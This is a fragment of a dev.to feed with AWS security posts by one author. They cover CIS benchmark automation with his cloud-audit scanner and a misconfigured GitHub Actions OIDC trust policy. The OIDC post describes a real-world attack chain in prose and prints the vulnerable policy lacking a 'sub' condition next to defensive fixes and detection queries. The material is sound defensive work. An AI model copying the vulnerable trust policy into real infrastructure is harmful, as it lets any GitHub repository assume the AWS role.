&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Section&lt;/th&gt;
&lt;th&gt;Controls&lt;/th&gt;
&lt;th&gt;What it covers&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1 - Identity and Access Management&lt;/td&gt;
&lt;td&gt;22&lt;/td&gt;
&lt;td&gt;Root MFA, password policies, access keys, IAM roles, Access Analyzer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2 - Storage&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;S3 encryption, public access blocks, RDS encryption, EFS encryption&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3 - Logging&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;CloudTrail, AWS Config, VPC flow logs, S3 object-level logging&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4 - Monitoring&lt;/td&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;CloudWatch metric filters + alarms for 15 event categories + Security Hub&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5 - Networking&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Security groups, NACLs, default SG, IMDSv2&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Of these 62, &lt;strong&gt;55 are automatable&lt;/strong&gt; via AWS API calls. 7 require manual review (console-only settings, organizational decisions).&lt;/p&gt;

&lt;h2&gt;
  
  
  Automating the benchmark
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit&lt;/a&gt; v1.1.0 includes a compliance engine that covers all 62 CIS AWS Foundations Benchmark v3.0 controls and maps 55 of them to automated checks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;cloud-audit
cloud-audit scan &lt;span class="nt"&gt;--compliance&lt;/span&gt; cis_aws_v3
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output shows a per-control table with PASS, FAIL, PARTIAL, or N/A for each of the 62 controls:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Compliance Assessment
CIS Amazon Web Services Foundations Benchmark v3.0.0

Readiness: 45%  (25/55 assessed controls passing)
Coverage: 62 controls total, 55 assessed, 7 not assessed

 Status  ID      Title                                          Checks
 PASS    1.4     Ensure no root access key exists                  1/1
 PASS    1.5     Ensure MFA is enabled for root                    1/1
 FAIL    1.6     Ensure hardware MFA for root                      0/1
 FAIL    1.8     Ensure password policy min length 14              0/1
 ...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For the HTML report with full evidence and remediation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cloud-audit scan &lt;span class="nt"&gt;--compliance&lt;/span&gt; cis_aws_v3 &lt;span class="nt"&gt;--format&lt;/span&gt; html &lt;span class="nt"&gt;-o&lt;/span&gt; cis-report.html
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  What the compliance report includes
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc78gml2w6ixya1hk60ja.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fc78gml2w6ixya1hk60ja.png" alt="CIS AWS v3.0 compliance report" width="800" height="594"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Each failing control shows:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Evidence statement&lt;/strong&gt; - what was checked, what was found&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS CLI remediation&lt;/strong&gt; - the exact command to fix it&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Terraform code&lt;/strong&gt; - HCL you can copy into your infrastructure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS documentation link&lt;/strong&gt; - the official reference&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Attack chain context&lt;/strong&gt; - if the failure is part of an exploitable attack path&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;For example, a failing CIS 1.8 (password policy) shows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_iam_account_password_policy"&lt;/span&gt; &lt;span class="s2"&gt;"strict"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;minimum_password_length&lt;/span&gt;      &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;14&lt;/span&gt;
  &lt;span class="nx"&gt;require_lowercase_characters&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="nx"&gt;require_uppercase_characters&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="nx"&gt;require_numbers&lt;/span&gt;              &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="nx"&gt;require_symbols&lt;/span&gt;              &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="nx"&gt;password_reuse_prevention&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;24&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
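
&lt;p&gt;For comparison, the same settings can be applied with the standard AWS CLI. This is an equivalent sketch using &lt;code&gt;aws iam update-account-password-policy&lt;/code&gt;, not necessarily the exact command text the report prints.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Apply the same settings as the Terraform resource above
aws iam update-account-password-policy \
  --minimum-password-length 14 \
  --require-lowercase-characters \
  --require-uppercase-characters \
  --require-numbers \
  --require-symbols \
  --password-reuse-prevention 24

# Confirm what is now in effect
aws iam get-account-password-policy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Note that this call replaces the whole policy rather than patching it: any setting you leave out reverts to its default, so include everything you want to keep.&lt;/p&gt;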



&lt;h2&gt;
  
  
  Attack chains in compliance context
&lt;/h2&gt;

&lt;p&gt;Individual CIS benchmark checks operate in isolation. However, the key issue is the combination of failing controls, as these create vulnerable attack paths. Individual findings alone aren't as bad as their combination. Based on findings, the tool can route results to 20 attack chain rules (describing precisely which ones are included).&lt;/p&gt;

&lt;p&gt;For example, if both CIS 1.5 (root MFA) and CIS 3.1 (CloudTrail) fail, the scanner reports &lt;strong&gt;AC-09: Unmonitored administrator access&lt;/strong&gt; - root has no MFA and there is no audit trail.&lt;/p&gt;

&lt;p&gt;This gives auditors and auditees something CIS checklists don't offer: a risk prioritization view indicating which failures are most important.&lt;/p&gt;

&lt;h2&gt;
  
  
  How it compares to other tools
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;AWS Security Hub&lt;/th&gt;
&lt;th&gt;Prowler (OSS)&lt;/th&gt;
&lt;th&gt;cloud-audit&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;CIS v3.0 controls&lt;/td&gt;
&lt;td&gt;37 automated&lt;/td&gt;
&lt;td&gt;62&lt;/td&gt;
&lt;td&gt;62 (55 automated)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remediation per control&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;CIS only&lt;/td&gt;
&lt;td&gt;Every control (CLI + Terraform)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Attack chain detection&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Paid App only&lt;/td&gt;
&lt;td&gt;20 rules (free)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cost&lt;/td&gt;
&lt;td&gt;~$0.001/check&lt;/td&gt;
&lt;td&gt;Free&lt;/td&gt;
&lt;td&gt;Free&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  What is next
&lt;/h2&gt;

&lt;p&gt;CIS is the first framework. SOC 2, BSI C5, ISO 27001, HIPAA, and NIS2 are planned.&lt;/p&gt;

&lt;p&gt;Full documentation: &lt;a href="https://haitmg.pl/cloud-audit/" rel="noopener noreferrer"&gt;haitmg.pl/cloud-audit&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;GitHub: &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;github.com/gebalamariusz/cloud-audit&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;Have you automated your CIS compliance process? What tools are you using? I'd love to hear about your experience in the comments.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>terraform</category>
      <category>opensource</category>
    </item>
    <item>
      <title>Prowler vs ScoutSuite vs cloud-audit [2026]</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Wed, 18 Mar 2026 14:17:03 +0000</pubDate>
      <link>https://dev.to/haitmg/prowler-vs-scoutsuite-vs-cloud-audit-2026-2i55</link>
      <guid>https://dev.to/haitmg/prowler-vs-scoutsuite-vs-cloud-audit-2026-2i55</guid>
      <description>&lt;p&gt;As of 2026, we can find many open source tools that scan AWS accounts for potentially unsafe configurations. Anyone who cares about the security of their AWS infrastructure has likely already searched for such tools and stumbled upon &lt;a href="https://github.com/prowler-cloud/prowler" rel="noopener noreferrer"&gt;Prowler&lt;/a&gt;, &lt;a href="https://github.com/nccgroup/ScoutSuite" rel="noopener noreferrer"&gt;ScoutSuite&lt;/a&gt;, Trivy, Steampipe, and a few others while browsing "best tools" rankings.&lt;/p&gt;

&lt;p&gt;I've used most of them myself and seen both their pros and cons, which prompted me to build my own scanner. In this post, I'd like to compare three CLI-based scanners - Prowler, ScoutSuite, and &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit&lt;/a&gt; (my tool). I'll try to be as objective as possible and let the comparison speak for itself.&lt;/p&gt;

&lt;p&gt;Each solves different problems at different scales. I'll point out where each scanner fits and where it doesn't.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://haitmg.pl/blog/aws-security-scanners-compared/" rel="noopener noreferrer"&gt;haitmg.pl&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://haitmg.pl/blog/aws-security-scanners-compared/" rel="noopener noreferrer"&gt;Read the full article with comparison table and code examples on haitmg.pl&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>devops</category>
      <category>opensource</category>
    </item>
    <item>
      <title>I Audit AWS Accounts. 8 Out of 10 Have This GitHub Actions Backdoor.</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Mon, 16 Mar 2026 11:17:54 +0000</pubDate>
      <link>https://dev.to/haitmg/i-audit-aws-accounts-8-out-of-10-have-this-github-actions-backdoor-4g9k</link>
      <guid>https://dev.to/haitmg/i-audit-aws-accounts-8-out-of-10-have-this-github-actions-backdoor-4g9k</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; Configuring GitHub Actions OIDC is very convenient and useful, but often dangerous. If you didn't consider one specific IAM requirement and created a role before June 2025, you're almost certainly vulnerable to an attack that would allow ANY GitHub repository to assume your AWS deployment role.&lt;/p&gt;




&lt;p&gt;The title sounds scary and clickbaity, right? Unfortunately, only the second part is false: it's not clickbait. Last week, Google published details about a threat group called UNC6426. A single compromised npm package led to full AWS admin access within 72 hours. How was this possible? A poisoned npm package stole a developer's GitHub token. From there, the path was clear - straight to production on AWS, with no password and no alert.&lt;/p&gt;

&lt;p&gt;The door they used? It's probably open in your account right now.&lt;/p&gt;

&lt;h2&gt;
  
  
  How a single npm install led to AWS admin
&lt;/h2&gt;

&lt;p&gt;Let's take a look at the attack process and try to understand it in simple terms. One developer came to work on Monday morning and made a to-do list for the day. The first task required installing an npm package, just like any other, from a trusted registry. The problem was that this package contained a credential-stealing script called QUIETVAULT. It worked by silently extracting the developer's personal GitHub token.&lt;/p&gt;

&lt;p&gt;The attackers used the stolen token to gain access to the organization's GitHub repository. Next, they used the open-source Nord Stream tool to extract secrets from CI/CD. After some searching, they found a GitHub Actions workflow that deployed to AWS using OIDC. OIDC is a "modern" and secure authentication method that doesn't require storing access keys.&lt;/p&gt;

&lt;p&gt;Sound bad? We're just getting started. The AWS role used by GitHub Actions was configured so that any GitHub repo could assume it. ALL of them, not just those belonging to the organization.&lt;/p&gt;

&lt;p&gt;So what did the attackers do with this? They generated temporary AWS credentials by exploiting the misconfigured OIDC trust. Next, they deployed a CloudFormation stack that created a completely new IAM role with admin access. No existing credentials to steal? They simply created their own.&lt;/p&gt;

&lt;p&gt;All this took less than 72 hours.&lt;/p&gt;

&lt;p&gt;Datadog Security Labs detected over 500 roles with the exact same misconfiguration across ~275 AWS accounts. You know how? By scanning public GitHub workflows. One of them belonged to the British government's digital service...&lt;/p&gt;

&lt;h2&gt;
  
  
  What's OIDC and why should you care
&lt;/h2&gt;

&lt;p&gt;Anyone with a passing understanding of security knows to use OIDC when connecting GitHub Actions to AWS. This approach lets the two talk to each other without storing long-lived credentials. And that's great, that's the point. It just needs to be configured correctly.&lt;/p&gt;

&lt;p&gt;You're only as secure as the trust policy that controls who can assume the role. Configure it incorrectly, and you've left the door wide open to a potential burglar.&lt;/p&gt;

&lt;p&gt;Consider a real-life analogy. You installed the most heavily armored door in your house. Not even an explosive device can break it down. And then you hung the key to that door on the doorknob.&lt;/p&gt;

&lt;h2&gt;
  
  
  The vulnerability - one missing line
&lt;/h2&gt;

&lt;p&gt;Here's what I find in roughly 8 out of 10 client accounts. Look at the &lt;code&gt;Condition&lt;/code&gt; block:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"Condition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringEquals"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Looks professional and secure, eh? Almost. Only one condition is being checked - the audience. It confirms that the token is intended for AWS, but it says nothing about who is presenting it.&lt;/p&gt;

&lt;p&gt;Now look at the secure version:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="nl"&gt;"Condition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"StringEquals"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"token.actions.githubusercontent.com:sub"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"repo:my-org/my-repo:ref:refs/heads/main"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One line. Adding the &lt;code&gt;sub&lt;/code&gt; claim condition locks the role down to a specific repository and branch.&lt;/p&gt;

&lt;p&gt;Without that, you can think of it like this: you go to a concert, go through a series of personal checks, and then hand in your ticket for verification. The security guard looks at you - you have a ticket, come on in. He just didn't check if it was a ticket for this concert...&lt;/p&gt;
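
&lt;p&gt;If pinning to a single branch is too strict for your workflow, the &lt;code&gt;sub&lt;/code&gt; condition can also take a wildcard. A minimal sketch, assuming a placeholder repository &lt;code&gt;my-org/my-repo&lt;/code&gt; that should be allowed to assume the role from any branch, tag, or environment. Note that wildcards only work with &lt;code&gt;StringLike&lt;/code&gt;; under &lt;code&gt;StringEquals&lt;/code&gt; the &lt;code&gt;*&lt;/code&gt; is treated as a literal character:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;"Condition": {
  "StringEquals": {
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
  },
  "StringLike": {
    "token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:*"
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Keep the wildcard after the repository name. A pattern like &lt;code&gt;repo:*&lt;/code&gt; matches every repository on GitHub, which is no better than having no &lt;code&gt;sub&lt;/code&gt; condition at all.&lt;/p&gt;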

&lt;h2&gt;
  
  
  Check your account in 60 seconds
&lt;/h2&gt;

&lt;p&gt;Stop reading and run this. Find all roles that trust GitHub's OIDC provider but are missing the &lt;code&gt;sub&lt;/code&gt; condition:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws iam list-roles &lt;span class="nt"&gt;--output&lt;/span&gt; json | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'
  .Roles[]
  | select(
      .AssumeRolePolicyDocument.Statement[]
      | select(.Principal.Federated? // empty
        | endswith("token.actions.githubusercontent.com"))
      | (.Condition.StringEquals["token.actions.githubusercontent.com:sub"] //
         .Condition.StringLike["token.actions.githubusercontent.com:sub"]) == null
    )
  | "\(.RoleName) -- VULNERABLE"'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you see output - you have a problem.&lt;/p&gt;

&lt;p&gt;To inspect a specific role:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws iam get-role &lt;span class="nt"&gt;--role-name&lt;/span&gt; YOUR_ROLE_NAME &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'Role.AssumeRolePolicyDocument'&lt;/span&gt; &lt;span class="nt"&gt;--output&lt;/span&gt; json | jq &lt;span class="nb"&gt;.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No &lt;code&gt;sub&lt;/code&gt; condition in the output = vulnerable.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Terraform fix
&lt;/h2&gt;

&lt;p&gt;Don't use &lt;code&gt;jsonencode()&lt;/code&gt; for this policy. Duplicate map keys in HCL silently overwrite each other - this exact bug hit the UK Government Digital Service. Use &lt;code&gt;aws_iam_policy_document&lt;/code&gt; instead:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="s2"&gt;"aws_iam_policy_document"&lt;/span&gt; &lt;span class="s2"&gt;"github_actions_trust"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;statement&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;effect&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Allow"&lt;/span&gt;
    &lt;span class="nx"&gt;actions&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"sts:AssumeRoleWithWebIdentity"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

    &lt;span class="nx"&gt;principals&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Federated"&lt;/span&gt;
      &lt;span class="nx"&gt;identifiers&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;aws_iam_openid_connect_provider&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;arn&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="nx"&gt;condition&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;test&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"StringEquals"&lt;/span&gt;
      &lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"token.actions.githubusercontent.com:aud"&lt;/span&gt;
      &lt;span class="nx"&gt;values&lt;/span&gt;   &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="nx"&gt;condition&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;test&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"StringLike"&lt;/span&gt;
      &lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"token.actions.githubusercontent.com:sub"&lt;/span&gt;
      &lt;span class="nx"&gt;values&lt;/span&gt;   &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"repo:YOUR_ORG/YOUR_REPO:ref:refs/heads/main"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_iam_role"&lt;/span&gt; &lt;span class="s2"&gt;"github_actions"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;               &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"GitHubActionsRole"&lt;/span&gt;
  &lt;span class="nx"&gt;assume_role_policy&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;aws_iam_policy_document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;github_actions_trust&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;json&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two separate &lt;code&gt;condition&lt;/code&gt; blocks. No silent overwrites. No surprises.&lt;/p&gt;

&lt;h2&gt;
  
  
  What AWS fixed (and what they didn't)
&lt;/h2&gt;

&lt;p&gt;Back in June 2025, AWS introduced an additional safeguard that blocks the creation of new roles without this condition. A trust policy that is missing it is now rejected with an error.&lt;/p&gt;

&lt;p&gt;So the problem is solved, right?&lt;/p&gt;

&lt;p&gt;Not exactly. This safeguard only applies to new roles. Check your OIDC roles created before June 2025: if you didn't fix them yourself, AWS didn't fix them for you either.&lt;/p&gt;

&lt;h2&gt;
  
  
  Did someone already exploit this?
&lt;/h2&gt;

&lt;p&gt;If you use CloudTrail Lake, run this query to find any role assumptions from repos outside your organization:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;eventTime&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;userIdentity&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;github_subject&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
       &lt;span class="n"&gt;sourceIPAddress&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;your&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="k"&gt;data&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;store&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;eventSource&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'sts.amazonaws.com'&lt;/span&gt;
  &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;eventName&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'AssumeRoleWithWebIdentity'&lt;/span&gt;
  &lt;span class="k"&gt;AND&lt;/span&gt; &lt;span class="n"&gt;userIdentity&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;LIKE&lt;/span&gt; &lt;span class="s1"&gt;'repo:YOUR-GITHUB-ORG/%'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you see results - someone outside your org already used your role. Time to rotate credentials and check what they accessed.&lt;/p&gt;

&lt;h2&gt;
  
  
  One more thing
&lt;/h2&gt;

&lt;p&gt;I'm currently working on additional functionality to detect this configuration in my AWS &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit&lt;/a&gt; security scanner (it's completely open source). Any detection of this error will be included in a report, along with comments on how to fix it. If you'd like, please add a star to &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;the repo&lt;/a&gt;; it will help me develop and encourage further work.&lt;/p&gt;

